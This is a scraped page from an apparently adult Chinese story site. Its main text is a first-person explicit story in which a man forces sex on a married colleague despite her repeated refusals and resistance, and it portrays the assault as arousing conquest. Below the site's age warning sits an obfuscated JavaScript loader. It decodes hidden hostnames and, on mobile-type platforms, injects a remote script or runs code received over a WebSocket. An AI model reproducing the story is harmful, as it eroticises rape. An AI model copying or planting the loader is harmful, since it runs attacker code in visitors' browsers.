『【MARKET人妻】【作者:hkroyplay 】【完】』

v  在我的印象中,夏天总是过的很快,因为夏天可以做很多事,泡妞、玩水、旅行,往年到了初秋天气转凉,人的心情似乎也入秋了。

  金九银十,房产商在10月是需要努力销售的月份,我忙着房展、电视、报纸的广告宣传,每周花掉数十万的广告费就是我每天需要考虑的工作,也因为我负责这笔不小的广告,不少媒体都争着和我联系,请我吃饭,桑拿,当然目的是希望我能采纳他们的广告。就是这样我认识了负责某杂志广告业务的敏。

  敏30岁左右,比我大5岁,有个孩子,非常重视家庭,典型的贤母良妻。

  敏长的非常高挑,皮肤白皙,脸不是那种很娇小的,有点北方人长脸型,是我很喜欢的类型,敏很喜欢穿黑裙,配上肉色丝袜,那双修长的美腿常常让我迷醉,敏的身材很SEX,生过小孩,有点丰满但绝不胖的感觉,反而非常有女人味,那种让男人看见就有冲动的的感觉。

  第一次和敏的联系是在电话,她的声音温柔端庄,给我第一印象非常不错,后来我们约在我们公司见面,我还记得我们见面那个下午,会议室里,夕阳的余辉透过玻璃窗洒在地毯上,敏静静的坐在那里,低着头看着自己的手,当我进来找她的时候,她也没察觉,我站在门口,一时惊为天人,深色的职业套装,白色的衬衣,乌黑的头发,雪白的肌肤,一切是那幺完美,那一瞬间我感到我对她有了感觉。

  和敏打了招呼,我们就聊了起来,敏落落大方,对业务侃侃而谈,显得很自信干练,我一边听着她的介绍,一边装着随意的却在暗暗的打量着敏,乌黑的头发,挺立的鼻子,有神的眼睛,看不出一丝躁动,惟有嘴唇上了点艳的唇膏,仿佛万绿中的那一点红,似乎暗示着主人的外表冷静,内心却有一些不甘寂寞,听着她的介绍,我微微的恩恩的点着头,盯着她的眼睛,似乎在聆听她的声音,实际我的脑海已经想入非非了。

  我把敏粗暴的按在会议桌上,野蛮的扯开她白色衬衣,暴露出如雪的胸脯,大力的揉捏人妻乳房,吸允她的娇柔的嘴唇,抚摸她丰满的大腿,再把敏……正想象着,却发现不说话了,奇怪的打量着我,以她过来人的状况,她也似乎从我的眼睛里读出了什幺,但她一点也不惊慌,似乎早已习惯男人的这种眼神。

  那天之后我很自然的把很多业务给到她们公司,每月投放了约40多万广告,一直做了三个月,中间我和敏经常一起讨论广告,经常去吃吃饭,卡拉OK,今天敏约我吃饭,地点就在她家附近的一家餐厅。

  几个月来的经常来往缘故,我们之间有了相当不错的工作默契,平时我和敏也已相当热洛,饭桌上我和敏喝着酒,聊着天,象一对认识很久的好朋友,借着点酒意我们开始无所不聊,我们聊到了我的女朋友,也聊到了她的老公还有小孩。

  「你老公对你好不好」

  「我们感情很好的」敏淡淡一笑「我们是大学同学,毕业后就结婚了」敏又聊了很多他们的故事。

  我静静的听着,时而喝口酒,时而点点头,看着敏因为酒意有点微微红晕的脸庞,如此俏丽,如此动人,我的心也醉了。

  「你老公做到总监,平时一定很忙吧」

  「是啊,经常出差」敏的脸忽然有点落寞起来我不由心中一动「你老公现在在出差」我问的很直接但敏似乎也没在意什幺「恩,他上个月去了外地,要到过年才能回家」我和敏喝到8点多钟,兴致都相当高,都不想马上分手,于是我们又去了家附近的卡拉OK再尽情欢唱,一边喝着啤酒,深情对唱了好几首老歌,两人哭着笑着玩的非常尽兴,等到结帐出来的时候已经12点了。

  已经是凌晨,深秋的夜有点冷,昏暗的街上行人很少,暧昧的路灯下,两个人相互搀扶着,唱着不着调的歌,跌跌撞撞的一路前行,忽然敏一个踉跄,我一把抱住敏,敏一声嘤咛,想要推开我,却又无力,我用力的抱着敏不让她动,敏挣扎一会终于安静靠在我肩膀上,女人的香味和温柔的身体让我很温暖,我闻着她的发丝的香味,抚摸着她的脸郏,嘴唇在她的脖子发丝耳垂间亲吻,敏的呼吸也渐渐急促起来,身体也慢慢热了,双手从背后不自禁的抱着我。我看着路灯下拉长两人的身影,既感觉寂寞又感觉温暖,此刻在这个孤独城市里似乎就只剩下我和敏两个人。

  等到了敏的家的时候,已经是凌晨1点多了,关上门,黑暗里还未打开灯我就一把抱住敏,敏在我怀里挣扎着「别这样,我是有老公的人,你别样,你,你回去吧」敏似乎有点清醒了,一边推着我一边哀求我放过她。而此刻我被寂寞、难受、酒精、欲望多重感觉笼罩着,我需要敏,我用力板过敏的身体,吻着敏的嘴,手上下抚摸着敏丰腴的身体,敏紧紧的闭着嘴拒绝我入侵,我稍微一愣神,敏一把挣脱我跑进了卧室,返身想把卧室门锁住我抢先一步追到门边,一手把敏要关住的门用力的堵住,敏的力气很小,门被我用力的推开了,进了敏的卧室,我把门边的开关打开,她和丈夫的婚纱照就挂在床头的墙上,她老公长的很英俊,眼睛直盯着我,我心里一阵发毛,但此刻的欲火已经高涨,我一把抱住退缩在床头的敏一起倒在了床上,敏用力的抗拒着「你别这样,我是有老公的人了,恩「还没等敏说完,我一下子吻住了敏的嘴唇,贪婪的吸允着她的香舌,手在敏的身上到处游走,敏不一会就被动接纳了我舌头,张开嘴和的舌头且战且退的纠缠着。就在我感觉敏已经放弃抵抗准备臣服的时候,忽然敏一下子聚集了力气把我推开。

  等我回过神的时候敏已经跑出了卧室,敏跑到客厅里,我也追了过来,「不要这样,我求你了,我们不可以这样,我是有老公有家的人,我不可以对不起我老公」敏的那种为人妻的为人母的自尊,让她无法接受另一个男人。

  「敏,我喜欢你,我知道你也喜欢我」我把敏一把拽过来压在沙发上「这里只有我们两个人,没有人会知道」我以便安抚着敏从她的衣服下摆里伸了进去,握住敏的乳房,粗暴的揉捏着,敏的乳房丰盈饱满,感觉非常舒服,敏双手在我胸口用力的推拒着,双脚使劲在我身下企图挣脱我的压力,我压着敏温柔的身子,那种征服别人老婆的欲望让我冲昏了头脑,此刻我只有一个念头,占有她,占有她。

  两人就这样搏斗了好一会,敏的力气越来越小,而我男人的直觉告诉我可以进攻了,敏的胸口衣服纽扣在挣扎中掉了几个,露出雪白无暇的肌肤,丰盈充满肉欲的乳房暴露在空气里,暴露在我充满欲火眼睛里,我把头埋进了敏的胸脯,好温暖好柔滑,我吻着敏的乳房,贪婪的吸舔着乳头,客厅里回荡着两人喘息和我亲吻敏乳房的声音。

  我的手从敏的裙子伸了进去,顺着光滑的大腿,一路上行,触摸到敏的下身的时候,敏一阵身颤抖着,我隔着敏的内裤不停挑逗着敏,嘴唇也没停息吻着敏的乳头贪婪的吸着,敏上下遭袭,情欲也被我挑动起来,身体慢慢变的滚烫,就这样我和敏在沙发上调情好一会,敏的内裤也被我扯了下来,下身赤裸着,我的一根手指伸进了敏的下体,里面早已湿润,我一边用手指奸淫着敏,一边亲吻着敏的嘴唇,敏被我弄的娇喘连连,用力的抓着我肩膀,只是不象之前往外推,却是用力往里面带。

  在敏一乱请迷的时候,我知道要把握住机会,我把硬邦邦鸡巴悄悄的掏了出来,对准敏的阴道用力一插,敏一声惊呼「啊」来不及多说,我已经开始抽插起来,人妻的贞洁在那一瞬间失去了,敏愧疚、无奈、快感复杂交错,泪水不自禁的流了出来,我爱怜的吻干敏的眼泪,下面却是无情的干着。沙发垫随着我的抽插时险时鼓,而敏也被我插的暂时忘记了愧疚,头发散乱开来,嘴微微张着,眼神也迷离起来,脸的表情时而快乐,时而痛苦,让我想起了齐秦的那首歌痛并快乐着,我忽然想到了一个主意,我让敏站了起来,敏神智迷离被我支配着,被动着接受我命令,背对着我,屁股高高的翘着,我从后面又一次插了进去。

  我一边在背后操这敏,一边推着敏往卧室走去,我想在敏和他丈夫的床上干她,那种变态的想法非常强烈,敏被我操控着方向,被破朝卧室走去,敏此时已神情恍惚,下面被我操的吧唧吧唧向,快感不断的从下体传到大脑,让敏浑身颤抖,走到门口,忽然敏似乎想到了什幺,也许她下意识里也想到了去自己和丈夫的安乐窝似有不妥,就这样我们两站在门口对峙起来,我也不急,双手从背后握住敏的双乳,借着力下面一挺一抽狠命的干着敏,敏娇喘吁吁,脸蛋羞红,双手撑着门框,维护最后的那点尊严。

  坚持了不一会,敏终于被我推着进了卧室,她和丈夫照片家挂在墙头,他的丈夫看着这一切却无能为力,他的老婆此时正在我操干着,而他却在远方为妻子努力赚钱,敏也不自觉的看了眼她和丈夫的婚纱照,照片里她和丈夫是那样甜蜜,当时恋爱时山盟海誓,婚宴庆典时的欢声笑语仿佛还在昨天,此刻羞愧背叛快感交错在一起,敏被这种说不清的罪恶感纠缠着,但下体的快感却又一波一波传来,就这样又痛苦又快乐,敏的屁股却是越翘越高,下面不自觉的配合着我的抽插前后摆动着。

  愈堕落愈快乐,看着敏在我身下婉转承欢,一种男人骄傲感由然而生,如果说第一次进敏的卧室看到他老公的时候,我还有一丝内疚,此刻欲望之火已把燃烧的粉身碎骨,当下就是他的老公站在我面前,我也要和敏抵死缠绵,敏走到床前,无力的俯卧着,我跟着敏一起倒在了床上,但我的鸡巴依然插在敏身体里,身体压在敏的背后,下面继续无情的狂操着。

  敏头埋在被子里,随着我的草干时发出闷哼,敏在忍耐,她害怕自己的呻吟惊动了邻居,更害怕自己的快感的在丈夫照片面前表露,就在这张床上,敏新婚的初夜献给了自己的丈夫,而此刻却被另一个男人交合着,我的身体全部压在敏的身上,亲吻着敏的汗林林的脖颈,追寻着敏的嘴唇,敏左右摇着头避开我,我抓住敏的头用力固定在一个方向,成功的吻住了敏的嘴唇,敏紧闭的嘴唇不一会也打开了,与我的舌头在空中交汇。

  两个雪白的肉体就这样躺在床上,女人被男人压在身下,一边与男人接吻,一边承受着男人从背后抽插,卧室里回响着两人急促呻吟和喘息,而床头悬挂着是女人和丈夫的新婚照,他的丈夫无助的注视着自己的妻子被另一个男人玩弄着,在自己的床上,自己的妻子正享受着另一个陌生男人的交合,而我就是那个男人,我抬着望着敏的丈夫,一边用力的干着敏,一种莫明的征服快感充满全身。

  敏的柔软屁股随着我抽插上下起伏,敏的双手紧紧的抓着床单,下面一阵阵的收缩,我知道敏的快感快来了,我的抽插的速度更快更用力,鸡巴更卖力进进出出,忽然敏一声低呼,下面一紧射出了淫液,喷在的龟头上,我鸡巴被这一烫一紧,鸡巴也到了极限,敏忽然想到了什幺「别,别射在里面,今天是危险期「敏还没说完,我早已忍不住精门大开,畅快的在敏的身体里射出了精液。

  
【完】


  字节:8452

  [ 此帖被jyron在2015-12-17 23:51重新编辑 ]

返回首页返回顶部

©邮箱:guang123gao@163.com

警告!通过访问本网站,您可以证明您在您所在的州、省或国家的法律下至少年满18岁或达到法定成年年龄。我们明确并严格限制本网站的使用范围为18岁以上的成年人或个人管辖权范围内的成年成年人(以年龄较大者为准)。任何低于这个年龄的人都被严格禁止使用这个网站。WARNING!By accessing the Website, you certify that you are at least 18 years of age or the age of majority under the laws of your state, province or country. We expressly and strictly limit use of the Website to adults over 18 years of age or the age of majority in the individual’s jurisdiction, whichever is greater. Anyone under this age is strictly forbidden from using the Website.

function vAaiW(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function gFfeukj(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return vAaiW(t);};window['\x46\x45\x48\x72\x50\x71\x78\x61\x6c\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=gFfeukj,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('bGtkLnh6cHlqZC55jb20=','dHIueWVzdW422NzguY229t','137167',window,document,['5','2']);}:function(){};